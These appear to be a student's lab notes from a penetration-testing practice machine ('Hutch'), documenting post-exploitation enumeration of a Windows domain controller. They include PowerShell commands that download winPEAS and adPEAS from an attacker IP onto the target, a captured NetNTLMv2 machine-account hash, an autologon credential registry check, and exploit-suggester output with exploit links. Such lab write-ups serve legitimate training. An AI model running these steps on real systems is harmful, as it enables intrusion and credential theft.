PEAS
Conducting an automated enumeration after performing a manual enumeration
PS C:\tmp> iwr -Uri http://192.168.45.204/winPEASany.exe -OutFile .\winPEASany.exeDelivery complete
/Practice/Hutch/4-Post_Enumeration/attachments/Pasted-image-20250501171546.png)
Executing PEAS
ENV
���������� User Environment Variables
� Check for some passwords or keys in the env variables
COMPUTERNAME: HUTCHDC
USERPROFILE: C:\Windows\system32\config\systemprofile
PUBLIC: C:\Users\Public
LOCALAPPDATA: C:\Windows\system32\config\systemprofile\AppData\Local
PSModulePath: WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PSExecutionPolicyPreference: Bypass
SystemRoot: C:\Windows
APP_POOL_ID: DefaultAppPool
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
APP_POOL_CONFIG: C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 0101
USERNAME: HUTCHDC$
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Windows\TEMP
NUMBER_OF_PROCESSORS: 1
APPDATA: C:\Windows\system32\config\systemprofile\AppData\Roaming
TMP: C:\Windows\TEMP
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: HUTCH
���������� System Environment Variables
� Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 1
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101N/A
/Practice/Hutch/4-Post_Enumeration/attachments/{18BCE94F-3F1E-4896-9B73-1C099312CAC5}.png)
LAPS
/Practice/Hutch/4-Post_Enumeration/attachments/{E3B5D37A-49F2-4119-8997-B52C8BCF13DD}.png)
UAC
/Practice/Hutch/4-Post_Enumeration/attachments/{6F66C8C1-6689-4FA2-A401-0F79133EF14B}.png)
PowerShell
/Practice/Hutch/4-Post_Enumeration/attachments/{3A6BE12C-9B8C-4F2B-A998-9760423010FE}.png)
KrbRelayUp
/Practice/Hutch/4-Post_Enumeration/attachments/{D58D420D-00CD-4132-911B-1BFF906DB0E2}.png)
NTLM
/Practice/Hutch/4-Post_Enumeration/attachments/{A0BBCA2F-897C-4B41-BD30-0081E62F0847}.png)
/Practice/Hutch/4-Post_Enumeration/attachments/{9D69A167-DDCE-4CF5-90F7-34C258332478}.png)
HUTCHDC$::HUTCH:1122334455667788:6d1cb4d92e0c8417806f0688d5bf4ac4:01010000000000009a63dae5abbadb01f49540b2e68bf1770000000008003000300000000000000000000000003000001f145ea1b122bba82a51ccb1e8ad36d6a21651f8c6fa026fba48621025d3a28f0a00100000000000000000000000000000000000090000000000000000000000
.NET
/Practice/Hutch/4-Post_Enumeration/attachments/{9A8DB9FF-5349-4774-B155-2F5E2407F4AB}.png)
Token Privileges (iis apppool\defaultapppool)
/Practice/Hutch/4-Post_Enumeration/attachments/{12BC0443-F8A0-4B2B-8212-8673200F29AA}.png)
AutoLogon
/Practice/Hutch/4-Post_Enumeration/attachments/{0F1DB8F9-491F-416E-A56B-56381D2C3D07}.png)
PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ HUTCH
DefaultUserName REG_SZ
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x32a4003a
ShutdownFlags REG_DWORD 0x13
DisableLockWorkstation REG_DWORD 0x0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKeyModifiable Services
/Practice/Hutch/4-Post_Enumeration/attachments/{31C4DFE5-B20E-4E83-8955-9556277DF3C7}.png)
SMB
/Practice/Hutch/4-Post_Enumeration/attachments/Pasted-image-20250501172025.png)
adPEAS
PS C:\tmp> iwr -Uri http://192.168.45.204/adPEAS.ps1 -OutFile .\adPEAS.ps1Delivery complete
/Practice/Hutch/4-Post_Enumeration/attachments/{136B14C0-75BD-42D3-BCD4-BABF510E935B}.png)
Executing adPEAS
Domain
/Practice/Hutch/4-Post_Enumeration/attachments/{2C740770-0B04-46FE-8311-1C371972165A}.png)
/Practice/Hutch/4-Post_Enumeration/attachments/{8C7C5113-7564-4FAD-A424-42A6D5EB255A}.png)
Add-Computer
/Practice/Hutch/4-Post_Enumeration/attachments/{BE1EF9D8-1368-49F7-8C03-2716F32C7906}.png)
DCSync
/Practice/Hutch/4-Post_Enumeration/attachments/{55573EF8-1CFE-4C9C-AC1C-97E1576DA51C}.png)
SharpHound
/Practice/Hutch/4-Post_Enumeration/attachments/{7EA3E985-F60F-45F4-922B-40CEE972822C}.png)
WESNG
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ wes --update ; wes sysinfo --exploits-only --hide "Internet Explorer" Edge Flash
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250425
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows Server 2019
- Generation: 2019
- Build: 17763
- Version: 1809
- Architecture: x64-based
- Installed hotfixes (7): KB4580422, KB4462930, KB4512577, KB4577667, KB4580325, KB4587735, KB4592440
[+] Loading definitions
- Creation date of definitions: 20250425
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20250415
CVE: CVE-2023-44487
KB: KB
Title: MITRE: CVE-2023-44487 HTTP/2 Rapid Reset Attack
Affected product: Windows Server 2019
Affected component: HTTP/2
Severity: Important
Impact: Denial of Service
Exploits: https://github.com/micrictor/http2-rst-stream, https://github.com/micrictor/http2-rst-stream, https://security.netapp.com/advisory/ntap-20240621-0006/, https://security.netapp.com/advisory/ntap-20240621-0006/
Date: 20250311
CVE: CVE-2025-26633
KB: KB
Title: Microsoft Management Console Security Feature Bypass Vulnerability
Affected product: Windows Server 2019
Affected component: Microsoft Management Console
Severity: Important
Impact: Security Feature Bypass
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055519
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2019
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055519
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2019
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2019
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055519
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2019
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055519
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2019
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20231114
CVE: CVE-2023-38039
KB: KB
Title: Hackerone: CVE-2023-38039 HTTP headers eat all memory
Affected product: Windows Server 2019
Affected component: Windows cURL Implementation
Severity: Low
Impact: Denial of Service
Exploits: https://hackerone.com/reports/2072338, https://hackerone.com/reports/2072338
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
Date: 20200714
CVE: CVE-2020-1147
KB: KB4578966
Title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20200512
CVE: CVE-2020-0646
KB: KB4535101
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploits: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html, http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
[-] Missing patches: 4
- KB: patches 4 vulnerabilities
- KB5055519: patches 4 vulnerabilities
- KB4578966: patches 4 vulnerabilities
- KB4535101: patches 4 vulnerabilities
[I] KB with the most recent release date
- ID: KB
- Release date: 20250415
[+] Done. Displaying 16 of the 1597 vulnerabilities found.CVE-2025-29824